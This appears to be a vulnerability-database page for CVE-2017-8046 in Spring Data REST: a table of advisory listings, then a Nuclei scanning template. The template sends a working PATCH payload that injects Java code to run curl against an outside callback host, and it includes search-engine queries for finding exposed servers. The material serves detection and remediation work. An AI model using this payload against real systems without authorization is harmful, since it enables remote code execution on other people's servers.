| Title | Published | Views | Reporter |
|---|---|---|---|
| Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution Ex | 16 Mar 2018 00:00 | – | zdt |
| CVE-2017-8046 | 4 Jan 2018 00:00 | – | attackerkb |
| CVE-2017-8046 | 18 Dec 2023 10:21 | – | circl |
| Pivotal Spring Data REST Remote Code Execution Vulnerability | 22 Sep 2017 00:00 | – | cnvd |
| Pivotal Spring PATCH Request Remote Code Execution (CVE-2017-8046) | 9 Nov 2017 00:00 | – | checkpoint_advisories |
| CVE-2017-8046 | 4 Jan 2018 06:00 | – | cve |
| CVE-2017-8046 | 4 Jan 2018 06:00 | – | cvelist |
| Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution | 15 Mar 2018 00:00 | – | exploitdb |
| Spring Data REST 2.6.9 (Ingalls SR9) 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution | 15 Mar 2018 00:00 | – | exploitpack |
| Exploit for Incomplete List of Disallowed Inputs in Fasterxml Jackson-Databind | 4 Dec 2017 10:07 | – | githubexploit |

```yaml
id: CVE-2017-8046

info:
  name: Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
  author: domwhewell-sage
  severity: critical
  description: |
    Spring Data REST < 2.6.9 and 3.0.1, Spring Boot < 1.5.9 and 2.0 M6 contain a remote code execution caused by processing malicious PATCH requests with crafted JSON data, letting attackers execute arbitrary Java code, exploit requires sending malicious PATCH requests.
  impact: |
    Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code.
  remediation: |
    To remediate this vulnerability, update to Spring Data REST version 2.6.9 or later, or 3.0.1 or later, and Spring Boot version 1.5.9 or later, or 2.0 M6 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-8046
    - https://spring.io/security/cve-2017-8046
    - https://access.redhat.com/errata/RHSA-2018:2405
    - https://www.exploit-db.com/exploits/44289/
    - https://github.com/jkutner/spring-break-cve-2017-8046
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-8046
    cwe-id: CWE-20
    epss-score: 0.72782
    epss-percentile: 0.99376
    cpe: cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*
  metadata:
    vendor: vmware
    product: spring_boot
    shodan-query: http.title:"eureka"
    fofa-query: title="eureka"
    google-query: intitle:"eureka"
  tags: cve,cve2017,pivotal,springboot,pivotal_software,vkev,vuln

flow: |
  http(1)
  set("endpoint", iterate(template.endpoint)[0])
  http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        internal: true
        part: header
        words:
          - "application/json"
          - "application/hal+json"
          - "application/vnd.spring-boot.actuator"
        condition: or

      - type: word
        internal: true
        part: body
        words:
          - '"_embedded"'
          - '"_links"'
          - '"page"'
          - '"size"'
        condition: or

    extractors:
      - type: regex
        name: endpoint
        part: body
        group: 1
        internal: true
        regex:
          - '"href"\s*:\s*"([^"]+)\{\?page,size,sort\}"'

  - method: PATCH
    path:
      - "{{endpoint}}/1"

    headers:
      Content-Type: application/json-patch+json

    body: |
      [
        {
          "op": "replace",
          "path": "T(java.lang.Runtime).getRuntime().exec(\"curl {{interactsh-url}}\").x",
          "value": "CVE-2017-8046"
        }
      ]

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - "org.springframework"
# digest: 4a0a00473045022100fbf72ce1dec99936a03d3fb570507e79b5daa635d89d4e87ccbc60a97fb0ae980220604cf2261bea0b083768cf5dc07d109863da4dafa0287fc915db2211d45b7ddd:922c64590222798bb761d5b6d8e72950
```